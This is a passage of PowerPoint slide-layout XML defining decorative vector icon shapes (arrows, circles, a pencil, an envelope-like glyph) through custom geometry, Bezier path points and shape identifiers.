                    <a:pt x="109" y="40"/>
                    <a:pt x="95" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="40"/>
                    <a:pt x="45" y="58"/>
                    <a:pt x="39" y="8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1" y="31"/>
                    <a:pt x="49" y="0"/>
                    <a:pt x="94" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="120" y="0"/>
                    <a:pt x="146" y="13"/>
                    <a:pt x="163" y="29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96" y="95"/>
                    <a:pt x="196" y="95"/>
                    <a:pt x="196" y="95"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="115" y="73"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="61" y="142"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="71" y="150"/>
                    <a:pt x="87" y="158"/>
                    <a:pt x="101" y="158"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="128" y="158"/>
                    <a:pt x="151" y="140"/>
                    <a:pt x="157" y="115"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="125"/>
                    <a:pt x="196" y="125"/>
                    <a:pt x="196" y="125"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="185" y="167"/>
                    <a:pt x="147" y="198"/>
                    <a:pt x="101" y="198"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="198"/>
                    <a:pt x="50" y="185"/>
                    <a:pt x="32" y="169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1" y="125"/>
                    <a:pt x="81" y="125"/>
                    <a:pt x="81" y="125"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="61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53">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76EF8B0B-7B44-4D0A-BB94-951B5C2A4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348066">
              <a:off x="5190905" y="5189844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54">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D102492-C988-4C21-BB1E-C74FE5EB66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03112" y="1787563"/>
              <a:ext cx="747712" cy="747713"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 99 w 199"/>
                <a:gd name="T1" fmla="*/ 0 h 199"/>
                <a:gd name="T2" fmla="*/ 199 w 199"/>
                <a:gd name="T3" fmla="*/ 100 h 199"/>
                <a:gd name="T4" fmla="*/ 99 w 199"/>
                <a:gd name="T5" fmla="*/ 199 h 199"/>
                <a:gd name="T6" fmla="*/ 0 w 199"/>
                <a:gd name="T7" fmla="*/ 100 h 199"/>
                <a:gd name="T8" fmla="*/ 99 w 199"/>
                <a:gd name="T9" fmla="*/ 0 h 199"/>
                <a:gd name="T10" fmla="*/ 99 w 199"/>
                <a:gd name="T11" fmla="*/ 166 h 199"/>
                <a:gd name="T12" fmla="*/ 158 w 199"/>
                <a:gd name="T13" fmla="*/ 129 h 199"/>
                <a:gd name="T14" fmla="*/ 134 w 199"/>
                <a:gd name="T15" fmla="*/ 118 h 199"/>
                <a:gd name="T16" fmla="*/ 99 w 199"/>
                <a:gd name="T17" fmla="*/ 140 h 199"/>
                <a:gd name="T18" fmla="*/ 60 w 199"/>
                <a:gd name="T19" fmla="*/ 101 h 199"/>
                <a:gd name="T20" fmla="*/ 99 w 199"/>
                <a:gd name="T21" fmla="*/ 63 h 199"/>
                <a:gd name="T22" fmla="*/ 127 w 199"/>
                <a:gd name="T23" fmla="*/ 75 h 199"/>
                <a:gd name="T24" fmla="*/ 111 w 199"/>
                <a:gd name="T25" fmla="*/ 85 h 199"/>
                <a:gd name="T26" fmla="*/ 161 w 199"/>
                <a:gd name="T27" fmla="*/ 105 h 199"/>
                <a:gd name="T28" fmla="*/ 164 w 199"/>
                <a:gd name="T29" fmla="*/ 51 h 199"/>
                <a:gd name="T30" fmla="*/ 150 w 199"/>
                <a:gd name="T31" fmla="*/ 61 h 199"/>
                <a:gd name="T32" fmla="*/ 99 w 199"/>
                <a:gd name="T33" fmla="*/ 36 h 199"/>
                <a:gd name="T34" fmla="*/ 34 w 199"/>
                <a:gd name="T35" fmla="*/ 101 h 199"/>
                <a:gd name="T36" fmla="*/ 99 w 199"/>
                <a:gd name="T37" fmla="*/ 1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199">
                  <a:moveTo>
                    <a:pt x="99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99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99" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="99" y="166"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="125" y="166"/>
                    <a:pt x="147" y="151"/>
                    <a:pt x="158" y="129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28" y="131"/>
                    <a:pt x="114" y="140"/>
                    <a:pt x="99" y="140"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="78" y="140"/>
                    <a:pt x="60" y="123"/>
                    <a:pt x="60" y="101"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="60" y="80"/>
                    <a:pt x="78" y="63"/>
                    <a:pt x="99" y="63"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="110" y="63"/>
                    <a:pt x="120" y="67"/>
                    <a:pt x="127" y="7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50" y="61"/>
                    <a:pt x="150" y="61"/>
                    <a:pt x="150" y="61"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="46"/>
                    <a:pt x="119" y="36"/>
                    <a:pt x="99" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="36"/>
                    <a:pt x="34" y="65"/>
                    <a:pt x="34" y="101"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="137"/>
                    <a:pt x="63" y="166"/>
                    <a:pt x="99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55">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43EFE23D-DAF0-4B3E-A63C-46E0EC906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48710" y="5440783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56">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6FD0371-223D-482C-AD5F-47604B3F96DA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="18910795">
              <a:off x="11427924" y="15247"/>
              <a:ext cx="754062" cy="741363"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 234 w 475"/>
                <a:gd name="T1" fmla="*/ 0 h 467"/>
                <a:gd name="T2" fmla="*/ 78 w 475"/>
                <a:gd name="T3" fmla="*/ 157 h 467"/>
                <a:gd name="T4" fmla="*/ 78 w 475"/>
                <a:gd name="T5" fmla="*/ 157 h 467"/>
                <a:gd name="T6" fmla="*/ 0 w 475"/>
                <a:gd name="T7" fmla="*/ 235 h 467"/>
                <a:gd name="T8" fmla="*/ 0 w 475"/>
                <a:gd name="T9" fmla="*/ 235 h 467"/>
                <a:gd name="T10" fmla="*/ 0 w 475"/>
                <a:gd name="T11" fmla="*/ 235 h 467"/>
                <a:gd name="T12" fmla="*/ 78 w 475"/>
                <a:gd name="T13" fmla="*/ 311 h 467"/>
                <a:gd name="T14" fmla="*/ 78 w 475"/>
                <a:gd name="T15" fmla="*/ 311 h 467"/>
                <a:gd name="T16" fmla="*/ 234 w 475"/>
                <a:gd name="T17" fmla="*/ 467 h 467"/>
                <a:gd name="T18" fmla="*/ 312 w 475"/>
                <a:gd name="T19" fmla="*/ 389 h 467"/>
                <a:gd name="T20" fmla="*/ 210 w 475"/>
                <a:gd name="T21" fmla="*/ 290 h 467"/>
                <a:gd name="T22" fmla="*/ 475 w 475"/>
                <a:gd name="T23" fmla="*/ 290 h 467"/>
                <a:gd name="T24" fmla="*/ 475 w 475"/>
                <a:gd name="T25" fmla="*/ 185 h 467"/>
                <a:gd name="T26" fmla="*/ 210 w 475"/>
                <a:gd name="T27" fmla="*/ 185 h 467"/>
                <a:gd name="T28" fmla="*/ 312 w 475"/>
                <a:gd name="T29" fmla="*/ 79 h 467"/>
                <a:gd name="T30" fmla="*/ 234 w 475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5" h="467">
                  <a:moveTo>
                    <a:pt x="234" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="78" y="157"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78" y="1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234" y="467"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="312" y="389"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210" y="290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="475" y="290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="475" y="185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210" y="185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="312" y="79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57">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FBDA15C-FC4A-4F24-BCF6-151CBC1843F7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="19087588">
              <a:off x="193920" y="5083603"/>
              <a:ext cx="747712" cy="741363"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 237 w 471"/>
                <a:gd name="T1" fmla="*/ 0 h 467"/>
                <a:gd name="T2" fmla="*/ 393 w 471"/>
                <a:gd name="T3" fmla="*/ 157 h 467"/>
                <a:gd name="T4" fmla="*/ 393 w 471"/>
                <a:gd name="T5" fmla="*/ 157 h 467"/>
                <a:gd name="T6" fmla="*/ 471 w 471"/>
                <a:gd name="T7" fmla="*/ 235 h 467"/>
                <a:gd name="T8" fmla="*/ 471 w 471"/>
                <a:gd name="T9" fmla="*/ 235 h 467"/>
                <a:gd name="T10" fmla="*/ 471 w 471"/>
                <a:gd name="T11" fmla="*/ 235 h 467"/>
                <a:gd name="T12" fmla="*/ 393 w 471"/>
                <a:gd name="T13" fmla="*/ 311 h 467"/>
                <a:gd name="T14" fmla="*/ 393 w 471"/>
                <a:gd name="T15" fmla="*/ 311 h 467"/>
                <a:gd name="T16" fmla="*/ 237 w 471"/>
                <a:gd name="T17" fmla="*/ 467 h 467"/>
                <a:gd name="T18" fmla="*/ 161 w 471"/>
                <a:gd name="T19" fmla="*/ 389 h 467"/>
                <a:gd name="T20" fmla="*/ 260 w 471"/>
                <a:gd name="T21" fmla="*/ 290 h 467"/>
                <a:gd name="T22" fmla="*/ 0 w 471"/>
                <a:gd name="T23" fmla="*/ 290 h 467"/>
                <a:gd name="T24" fmla="*/ 0 w 471"/>
                <a:gd name="T25" fmla="*/ 185 h 467"/>
                <a:gd name="T26" fmla="*/ 260 w 471"/>
                <a:gd name="T27" fmla="*/ 185 h 467"/>
                <a:gd name="T28" fmla="*/ 161 w 471"/>
                <a:gd name="T29" fmla="*/ 79 h 467"/>
                <a:gd name="T30" fmla="*/ 237 w 471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1" h="467">
                  <a:moveTo>
                    <a:pt x="237" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="393" y="157"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="393" y="157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393" y="311"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="393" y="311"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237" y="467"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="161" y="389"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="260" y="290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="260" y="185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="161" y="79"/>
                  </a:ln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60">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{343C265D-5B98-43E8-A71F-9B19BF95C2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26532" y="1262204"/>
              <a:ext cx="584398" cy="616937"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 239 w 449"/>
                <a:gd name="T1" fmla="*/ 190 h 474"/>
                <a:gd name="T2" fmla="*/ 286 w 449"/>
                <a:gd name="T3" fmla="*/ 237 h 474"/>
                <a:gd name="T4" fmla="*/ 49 w 449"/>
                <a:gd name="T5" fmla="*/ 474 h 474"/>
                <a:gd name="T6" fmla="*/ 0 w 449"/>
                <a:gd name="T7" fmla="*/ 427 h 474"/>
                <a:gd name="T8" fmla="*/ 191 w 449"/>
                <a:gd name="T9" fmla="*/ 237 h 474"/>
                <a:gd name="T10" fmla="*/ 0 w 449"/>
                <a:gd name="T11" fmla="*/ 47 h 474"/>
                <a:gd name="T12" fmla="*/ 47 w 449"/>
                <a:gd name="T13" fmla="*/ 0 h 474"/>
                <a:gd name="T14" fmla="*/ 239 w 449"/>
                <a:gd name="T15" fmla="*/ 190 h 474"/>
                <a:gd name="T16" fmla="*/ 239 w 449"/>
                <a:gd name="T17" fmla="*/ 190 h 474"/>
                <a:gd name="T18" fmla="*/ 355 w 449"/>
                <a:gd name="T19" fmla="*/ 237 h 474"/>
                <a:gd name="T20" fmla="*/ 165 w 449"/>
                <a:gd name="T21" fmla="*/ 47 h 474"/>
                <a:gd name="T22" fmla="*/ 213 w 449"/>
                <a:gd name="T23" fmla="*/ 0 h 474"/>
                <a:gd name="T24" fmla="*/ 402 w 449"/>
                <a:gd name="T25" fmla="*/ 190 h 474"/>
                <a:gd name="T26" fmla="*/ 402 w 449"/>
                <a:gd name="T27" fmla="*/ 190 h 474"/>
                <a:gd name="T28" fmla="*/ 449 w 449"/>
                <a:gd name="T29" fmla="*/ 237 h 474"/>
                <a:gd name="T30" fmla="*/ 213 w 449"/>
                <a:gd name="T31" fmla="*/ 474 h 474"/>
                <a:gd name="T32" fmla="*/ 165 w 449"/>
                <a:gd name="T33" fmla="*/ 427 h 474"/>
                <a:gd name="T34" fmla="*/ 355 w 449"/>
                <a:gd name="T35" fmla="*/ 23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74">
                  <a:moveTo>
                    <a:pt x="239" y="190"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="286" y="237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49" y="474"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="427"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="191" y="237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239" y="190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239" y="190"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="355" y="237"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="165" y="47"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213" y="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449" y="237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213" y="474"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="165" y="427"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="355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63">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7435EB27-DD95-47BC-9FA9-3D8E6F1823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07750" y="5681358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70">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCF7ABB1-8FC3-419F-BC4B-172542E93D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321078">
              <a:off x="6751607" y="4855414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71">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{332CB06B-62DC-4732-B286-B203FE03D8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87435" y="4726512"/>
              <a:ext cx="668338" cy="741363"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 157 w 178"/>
                <a:gd name="T1" fmla="*/ 53 h 197"/>
                <a:gd name="T2" fmla="*/ 125 w 178"/>
                <a:gd name="T3" fmla="*/ 21 h 197"/>
                <a:gd name="T4" fmla="*/ 141 w 178"/>
                <a:gd name="T5" fmla="*/ 5 h 197"/>
                <a:gd name="T6" fmla="*/ 160 w 178"/>
                <a:gd name="T7" fmla="*/ 5 h 197"/>
                <a:gd name="T8" fmla="*/ 173 w 178"/>
                <a:gd name="T9" fmla="*/ 18 h 197"/>
                <a:gd name="T10" fmla="*/ 173 w 178"/>
                <a:gd name="T11" fmla="*/ 37 h 197"/>
                <a:gd name="T12" fmla="*/ 157 w 178"/>
                <a:gd name="T13" fmla="*/ 53 h 197"/>
                <a:gd name="T14" fmla="*/ 65 w 178"/>
                <a:gd name="T15" fmla="*/ 144 h 197"/>
                <a:gd name="T16" fmla="*/ 33 w 178"/>
                <a:gd name="T17" fmla="*/ 113 h 197"/>
                <a:gd name="T18" fmla="*/ 119 w 178"/>
                <a:gd name="T19" fmla="*/ 28 h 197"/>
                <a:gd name="T20" fmla="*/ 151 w 178"/>
                <a:gd name="T21" fmla="*/ 59 h 197"/>
                <a:gd name="T22" fmla="*/ 65 w 178"/>
                <a:gd name="T23" fmla="*/ 144 h 197"/>
                <a:gd name="T24" fmla="*/ 8 w 178"/>
                <a:gd name="T25" fmla="*/ 170 h 197"/>
                <a:gd name="T26" fmla="*/ 27 w 178"/>
                <a:gd name="T27" fmla="*/ 119 h 197"/>
                <a:gd name="T28" fmla="*/ 59 w 178"/>
                <a:gd name="T29" fmla="*/ 150 h 197"/>
                <a:gd name="T30" fmla="*/ 8 w 178"/>
                <a:gd name="T31" fmla="*/ 170 h 197"/>
                <a:gd name="T32" fmla="*/ 150 w 178"/>
                <a:gd name="T33" fmla="*/ 181 h 197"/>
                <a:gd name="T34" fmla="*/ 158 w 178"/>
                <a:gd name="T35" fmla="*/ 189 h 197"/>
                <a:gd name="T36" fmla="*/ 150 w 178"/>
                <a:gd name="T37" fmla="*/ 197 h 197"/>
                <a:gd name="T38" fmla="*/ 8 w 178"/>
                <a:gd name="T39" fmla="*/ 197 h 197"/>
                <a:gd name="T40" fmla="*/ 0 w 178"/>
                <a:gd name="T41" fmla="*/ 189 h 197"/>
                <a:gd name="T42" fmla="*/ 8 w 178"/>
                <a:gd name="T43" fmla="*/ 181 h 197"/>
                <a:gd name="T44" fmla="*/ 150 w 178"/>
                <a:gd name="T45" fmla="*/ 18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" h="197">
                  <a:moveTo>
                    <a:pt x="157" y="53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6" y="0"/>
                    <a:pt x="155" y="0"/>
                    <a:pt x="160" y="5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8" y="23"/>
                    <a:pt x="178" y="32"/>
                    <a:pt x="173" y="37"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="157" y="53"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="65" y="144"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="113"/>
                    <a:pt x="33" y="113"/>
                    <a:pt x="33" y="113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65" y="144"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="8" y="170"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="27" y="119"/>
                    <a:pt x="27" y="119"/>
                    <a:pt x="27" y="119"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="59" y="150"/>
                    <a:pt x="59" y="150"/>
                    <a:pt x="59" y="150"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="8" y="170"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="150" y="181"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="154" y="181"/>
                    <a:pt x="158" y="185"/>
                    <a:pt x="158" y="189"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="158" y="194"/>
                    <a:pt x="154" y="197"/>
                    <a:pt x="150" y="197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4" y="197"/>
                    <a:pt x="0" y="194"/>
                    <a:pt x="0" y="189"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="185"/>
                    <a:pt x="4" y="181"/>
                    <a:pt x="8" y="181"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="150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72">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CB01E90-1CE3-4848-8F69-2CC9766409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3251596">
              <a:off x="-8378" y="6098394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73">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60C99038-963A-40EC-9442-5212837E3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89464" y="3905155"/>
              <a:ext cx="752475" cy="700088"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 184 w 200"/>
                <a:gd name="T1" fmla="*/ 100 h 186"/>
                <a:gd name="T2" fmla="*/ 184 w 200"/>
                <a:gd name="T3" fmla="*/ 56 h 186"/>
                <a:gd name="T4" fmla="*/ 145 w 200"/>
                <a:gd name="T5" fmla="*/ 90 h 186"/>
                <a:gd name="T6" fmla="*/ 100 w 200"/>
                <a:gd name="T7" fmla="*/ 129 h 186"/>
                <a:gd name="T8" fmla="*/ 69 w 200"/>
                <a:gd name="T9" fmla="*/ 103 h 186"/>
                <a:gd name="T10" fmla="*/ 18 w 200"/>
                <a:gd name="T11" fmla="*/ 148 h 186"/>
                <a:gd name="T12" fmla="*/ 36 w 200"/>
                <a:gd name="T13" fmla="*/ 160 h 186"/>
                <a:gd name="T14" fmla="*/ 109 w 200"/>
                <a:gd name="T15" fmla="*/ 160 h 186"/>
                <a:gd name="T16" fmla="*/ 121 w 200"/>
                <a:gd name="T17" fmla="*/ 176 h 186"/>
                <a:gd name="T18" fmla="*/ 20 w 200"/>
                <a:gd name="T19" fmla="*/ 176 h 186"/>
                <a:gd name="T20" fmla="*/ 0 w 200"/>
                <a:gd name="T21" fmla="*/ 156 h 186"/>
                <a:gd name="T22" fmla="*/ 0 w 200"/>
                <a:gd name="T23" fmla="*/ 20 h 186"/>
                <a:gd name="T24" fmla="*/ 20 w 200"/>
                <a:gd name="T25" fmla="*/ 0 h 186"/>
                <a:gd name="T26" fmla="*/ 180 w 200"/>
                <a:gd name="T27" fmla="*/ 0 h 186"/>
                <a:gd name="T28" fmla="*/ 200 w 200"/>
                <a:gd name="T29" fmla="*/ 20 h 186"/>
                <a:gd name="T30" fmla="*/ 200 w 200"/>
                <a:gd name="T31" fmla="*/ 119 h 186"/>
                <a:gd name="T32" fmla="*/ 184 w 200"/>
                <a:gd name="T33" fmla="*/ 100 h 186"/>
                <a:gd name="T34" fmla="*/ 16 w 200"/>
                <a:gd name="T35" fmla="*/ 126 h 186"/>
                <a:gd name="T36" fmla="*/ 55 w 200"/>
                <a:gd name="T37" fmla="*/ 90 h 186"/>
                <a:gd name="T38" fmla="*/ 16 w 200"/>
                <a:gd name="T39" fmla="*/ 55 h 186"/>
                <a:gd name="T40" fmla="*/ 16 w 200"/>
                <a:gd name="T41" fmla="*/ 126 h 186"/>
                <a:gd name="T42" fmla="*/ 164 w 200"/>
                <a:gd name="T43" fmla="*/ 16 h 186"/>
                <a:gd name="T44" fmla="*/ 36 w 200"/>
                <a:gd name="T45" fmla="*/ 16 h 186"/>
                <a:gd name="T46" fmla="*/ 16 w 200"/>
                <a:gd name="T47" fmla="*/ 31 h 186"/>
                <a:gd name="T48" fmla="*/ 100 w 200"/>
                <a:gd name="T49" fmla="*/ 106 h 186"/>
                <a:gd name="T50" fmla="*/ 184 w 200"/>
                <a:gd name="T51" fmla="*/ 33 h 186"/>
                <a:gd name="T52" fmla="*/ 164 w 200"/>
                <a:gd name="T53" fmla="*/ 16 h 186"/>
                <a:gd name="T54" fmla="*/ 160 w 200"/>
                <a:gd name="T55" fmla="*/ 106 h 186"/>
                <a:gd name="T56" fmla="*/ 200 w 200"/>
                <a:gd name="T57" fmla="*/ 146 h 186"/>
                <a:gd name="T58" fmla="*/ 160 w 200"/>
                <a:gd name="T59" fmla="*/ 186 h 186"/>
                <a:gd name="T60" fmla="*/ 120 w 200"/>
                <a:gd name="T61" fmla="*/ 146 h 186"/>
                <a:gd name="T62" fmla="*/ 160 w 200"/>
                <a:gd name="T63" fmla="*/ 106 h 186"/>
                <a:gd name="T64" fmla="*/ 152 w 200"/>
                <a:gd name="T65" fmla="*/ 176 h 186"/>
                <a:gd name="T66" fmla="*/ 168 w 200"/>
                <a:gd name="T67" fmla="*/ 176 h 186"/>
                <a:gd name="T68" fmla="*/ 168 w 200"/>
                <a:gd name="T69" fmla="*/ 163 h 186"/>
                <a:gd name="T70" fmla="*/ 152 w 200"/>
                <a:gd name="T71" fmla="*/ 163 h 186"/>
                <a:gd name="T72" fmla="*/ 152 w 200"/>
                <a:gd name="T73" fmla="*/ 176 h 186"/>
                <a:gd name="T74" fmla="*/ 152 w 200"/>
                <a:gd name="T75" fmla="*/ 156 h 186"/>
                <a:gd name="T76" fmla="*/ 168 w 200"/>
                <a:gd name="T77" fmla="*/ 156 h 186"/>
                <a:gd name="T78" fmla="*/ 168 w 200"/>
                <a:gd name="T79" fmla="*/ 116 h 186"/>
                <a:gd name="T80" fmla="*/ 152 w 200"/>
                <a:gd name="T81" fmla="*/ 116 h 186"/>
                <a:gd name="T82" fmla="*/ 152 w 200"/>
                <a:gd name="T8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86">
                  <a:moveTo>
                    <a:pt x="184" y="100"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="184" y="56"/>
                    <a:pt x="184" y="56"/>
                    <a:pt x="184" y="56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12" y="166"/>
                    <a:pt x="116" y="171"/>
                    <a:pt x="121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9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195" y="104"/>
                    <a:pt x="191" y="106"/>
                    <a:pt x="184" y="100"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="16" y="126"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="90"/>
                    <a:pt x="55" y="90"/>
                    <a:pt x="55" y="90"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="55"/>
                    <a:pt x="16" y="55"/>
                    <a:pt x="16" y="55"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="16" y="126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9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  <a:moveTo>
                    <a:pt x="160" y="106"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="182" y="106"/>
                    <a:pt x="200" y="124"/>
                    <a:pt x="200" y="146"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="200" y="168"/>
                    <a:pt x="182" y="186"/>
                    <a:pt x="160" y="186"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="186"/>
                    <a:pt x="120" y="168"/>
                    <a:pt x="120" y="146"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="120" y="124"/>
                    <a:pt x="138" y="106"/>
                    <a:pt x="160" y="106"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="152" y="176"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="168" y="176"/>
                    <a:pt x="168" y="176"/>
                    <a:pt x="168" y="176"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="168" y="163"/>
                    <a:pt x="168" y="163"/>
                    <a:pt x="168" y="163"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="152" y="163"/>
                    <a:pt x="152" y="163"/>
                    <a:pt x="152" y="163"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="152" y="176"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="152" y="156"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="168" y="156"/>
                    <a:pt x="168" y="156"/>
                    <a:pt x="168" y="15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52" y="116"/>
                    <a:pt x="152" y="116"/>
                    <a:pt x="152" y="116"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="152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74">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9979844-A0DC-4894-8809-16CA6E9A5A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402556">
              <a:off x="9876487" y="5447298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75">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
